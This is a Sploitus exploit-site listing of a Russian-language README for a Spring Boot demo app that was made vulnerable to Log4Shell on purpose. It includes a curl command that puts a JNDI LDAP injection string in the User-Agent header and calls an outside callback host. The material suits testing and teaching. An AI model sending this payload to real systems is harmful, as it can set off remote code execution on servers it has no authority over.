Sploitus

Exploit for log4shell-demo

kitploit Β· 2026-09-04

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KORTEKE-LOG4SHELL-DEMO
# ΠŸΡ€ΠΎΡΡ‚ΠΎΠ΅ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ Spring Boot, уязвимоС для Log4Shell (CVE-2021-44228)

  * ИзмСнСна стандартная систСма логирования с logback Π½Π° log4j2



ΠŸΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ Π»ΠΎΠ³ΠΈΡ€ΡƒΠ΅Ρ‚ Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ 'User-Agent', поэтому ΠΌΠΎΠΆΠ½ΠΎ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΡ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ curl ΠΈ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, interactsh-service:

root@kitploit:~
    
    
    curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
    

Π”ΠΎΠ»ΠΆΠ½Π° ΠΏΠΎΡΠ²ΠΈΡ‚ΡŒΡΡ DNS-взаимодСйствиС Π½Π° app.interactsh.com.

## Docker hub

Бсылка Π½Π° Docker hub